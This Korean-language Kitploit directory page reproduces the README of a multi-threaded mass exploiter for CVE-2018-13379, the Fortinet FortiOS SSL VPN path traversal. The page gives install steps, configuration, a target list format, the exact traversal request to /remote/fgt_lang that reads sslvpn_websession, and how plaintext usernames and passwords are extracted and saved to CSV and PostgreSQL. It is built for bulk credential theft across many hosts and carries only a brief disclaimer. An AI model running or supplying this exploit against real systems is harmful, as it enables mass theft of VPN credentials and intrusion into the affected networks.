Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Multi-threaded-mass-exploiter-CVE-2018-13379-POC — CVE-2018-13379 Fortinet FortiOS SSL VPN 대량 익스플로이터. 자격 증명을 즉시 추출하여 CSV + PostgreSQL에 저장합니다. 멀티스레드, 쓸데없는 경고 없음. | Kitploit
도구/GitHubGitHub/instructor-admin/multi-threaded-mass-exploiter-cve-2018-13379-poc
Password AttacksVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingRed Teaming
GitHubinstructor-admin/multi-threaded-mass-exploiter-cve-2018-13379-poc

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Multi-threaded-mass-exploiter-CVE-2018-13379-POC

CVE-2018-13379 Fortinet FortiOS SSL VPN 대량 익스플로이터. 자격 증명을 즉시 추출하여 CSV + PostgreSQL에 저장합니다. 멀티스레드, 쓸데없는 경고 없음.

저장소 보기
123개월 전아직 검토되지 않음

미리보기

CVE-2018-13379 — Fortinet FortiOS SSL VPN 대량 익스플로잇

Fortinet FortiOS SSL VPN의 CVE-2018-13379(경로 탐색) 취약점을 대량으로 악용하기 위한 도구입니다. 세션 파일을 읽고 로그인 및 비밀번호를 평문으로 추출할 수 있습니다.

특징

  • /remote/fgt_lang 엔드포인트를 통한 CVE-2018-13379 악용
  • 멀티스레딩(기본 20개 스레드)
  • 발견된 자격 증명을 CSV 및 PostgreSQL에 즉시 저장
  • PostgreSQL에서 타임스탬프가 포함된 동적 테이블 이름(fortios_creds_20250120_143052)
  • 경고 없음 - 결과만 표시

설치

root@kitploit:~
git clone https://github.com/Instructor-Admin/Multi-threaded-mass-exploiter-CVE-2018-13379-POC.git
cd Multi-threaded-mass-exploiter-CVE-2018-13379-POC
pip3 install requests psycopg2-binary

설정

모든 설정은 스크립트에서 직접 편집할 수 있습니다. 명령줄 인수로 애쓸 필요가 없습니다:

root@kitploit:~
TARGETS_FILE = "targets.txt" # File with targets (ip:port)
CSV_FILE = "fortios_creds.csv" # Output CSV file

PostgreSQL (선택 사항 - 스크립트는 데이터베이스 없이도 작동합니다)

root@kitploit:~
PG_HOST = "127.0.0.1"
PG_PORT = 5432
PG_DB = "fortios_db"
PG_USER = "postgres"
PG_PASSWORD = "password"
THREADS = 20
TIMEOUT = 8

사용법

  1. targets.txt 파일을 만들고 대상을 한 줄에 하나씩 입력합니다:
root@kitploit:~
192.168.1.1:8443
10.0.0.5:10443
172.16.0.1:443
  1. 스크립트를 실행합니다:
root@kitploit:~
python3 exploit.py

결과

  • CSV 파일 — 발견된 모든 자격 증명과 타임스탬프
  • PostgreSQL 테이블 — 실행할 때마다 새 테이블이 생성됩니다 (fortios_creds_YYYYMMDD_HHMMSS)

예시 출력:

root@kitploit:~
[+] 100 targets loaded. We're running in 20 threads...
[+] LEAKED: 192.168.1.1:8443
→ Pulled 3 credentials
Wrote 3 credentials to CSV
3 credentials entered into the DB
[-] Not leaky: 10.0.0.1:10443

작동 방식

  1. https://ip:port/remote/fgt_lang?lang=/../../../..///////////dev/cmdb/sslvpn_websession 주소로 GET 요청을 보냅니다.
  2. 응답에 var fgt_lang 문자열이 포함되어 있는지 확인합니다(취약점의 신호).
  3. 바이너리(binary) 응답에서 username 및 password 쌍을 추출합니다.
  4. 발견된 데이터는 즉시 CSV와 PostgreSQL에 저장됩니다.
  5. 스크립트가 다음 대상으로 이동합니다.

요구 사항

  • Python 3.6+
  • requests
  • psycopg2-binary (선택 사항 - 없으면 CSV 파일만 작동합니다)
  • urllib3

경고

이 도구는 교육 목적 및 승인된 테스트를 위한 것입니다. 귀하는 자신의 행동에 대한 책임이 있습니다.

감사의 말

  • 원래 취약점은 Meh Chang이 발견했습니다.
  • 악용 로직은 공개적으로 제공된 연구를 기반으로 합니다.

라이선스

Unlicense - 원하는 대로 사용하세요.

도구 다운로드